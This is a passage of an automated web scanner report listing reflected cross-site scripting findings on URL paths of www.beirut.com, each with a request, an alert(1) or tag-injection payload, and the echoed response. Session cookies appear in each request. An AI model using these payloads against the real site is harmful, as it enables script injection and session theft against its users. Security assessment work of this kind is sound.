HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:20:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Nightlifee7fca'-alert(1)-'bcd7c3d350/Pubs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.596. http://www.beirut.com/Nightlife/Pubs/242334555 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Nightlife/Pubs/242334555

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d189"><a>ee82da82aca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Nightlife9d189"><a>ee82da82aca/Pubs/242334555 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:14:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Nightlife9d189"><a>ee82da82aca">
...[SNIP]...

4.597. http://www.beirut.com/Nightlife/Pubs/242334555 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Pubs/242334555

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ab96'-alert(1)-'715bc2c72a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nightlife/Pubs3ab96'-alert(1)-'715bc2c72a5/242334555 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:25:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Nightlife/Pubs3ab96'-alert(1)-'715bc2c72a5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.598. http://www.beirut.com/Nightlife/Super-Nightclub/131874060 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Super-Nightclub/131874060

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 931bc'-alert(1)-'963b289fa78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nightlife931bc'-alert(1)-'963b289fa78/Super-Nightclub/131874060 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:29:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Nightlife931bc'-alert(1)-'963b289fa78/Super-Nightclub';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.599. http://www.beirut.com/Nightlife/Super-Nightclub/131874060 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Nightlife/Super-Nightclub/131874060

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bbe2"><a>f25926c30b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Nightlife3bbe2"><a>f25926c30b4/Super-Nightclub/131874060 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:22:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Nightlife3bbe2"><a>f25926c30b4">
...[SNIP]...

4.600. http://www.beirut.com/Nightlife/Super-Nightclub/131874060 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Super-Nightclub/131874060

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d504f'-alert(1)-'2563b831f04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nightlife/Super-Nightclubd504f'-alert(1)-'2563b831f04/131874060 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:33:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Nightlife/Super-Nightclubd504f'-alert(1)-'2563b831f04';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.601. http://www.beirut.com/Online-Internet/Blogs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Blogs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d58d"><a>ac48a56578b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet8d58d"><a>ac48a56578b/Blogs HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:43:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet8d58d"><a>ac48a56578b">
...[SNIP]...

4.602. http://www.beirut.com/Online-Internet/Blogs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Blogs

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5885f'-alert(1)-'687637bb642 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet5885f'-alert(1)-'687637bb642/Blogs HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:48:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet5885f'-alert(1)-'687637bb642/Blogs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.603. http://www.beirut.com/Online-Internet/Blogs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Blogs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59d6a'-alert(1)-'3b34277816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Blogs59d6a'-alert(1)-'3b34277816 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:54:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Blogs59d6a'-alert(1)-'3b34277816';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.604. http://www.beirut.com/Online-Internet/Business/56859781 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Business/56859781

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1eefc'-alert(1)-'7e00d9a754f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet1eefc'-alert(1)-'7e00d9a754f/Business/56859781 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:46:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet1eefc'-alert(1)-'7e00d9a754f/Business';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.605. http://www.beirut.com/Online-Internet/Business/56859781 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Business/56859781

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a97d"><a>23f65bdada9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet7a97d"><a>23f65bdada9/Business/56859781 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:36:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet7a97d"><a>23f65bdada9">
...[SNIP]...

4.606. http://www.beirut.com/Online-Internet/Business/56859781 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Business/56859781

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24096'-alert(1)-'6f3d30ecf5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internet/Business24096'-alert(1)-'6f3d30ecf5a/56859781 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:49:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Online-Internet/Business24096'-alert(1)-'6f3d30ecf5a';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.607. http://www.beirut.com/Online-Internet/Classifieds/395527905 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Classifieds/395527905

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8728'-alert(1)-'b470d472cc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Online-Internetc8728'-alert(1)-'b470d472cc4/Classifieds/395527905 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:16:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internetc8728'-alert(1)-'b470d472cc4/Classifieds';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.608. http://www.beirut.com/Online-Internet/Classifieds/395527905 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Online-Internet/Classifieds/395527905

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdd5c"><a>47dd424aae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetfdd5c"><a>47dd424aae/Classifieds/395527905 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:06:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetfdd5c"><a>47dd424aae">
...[SNIP]...

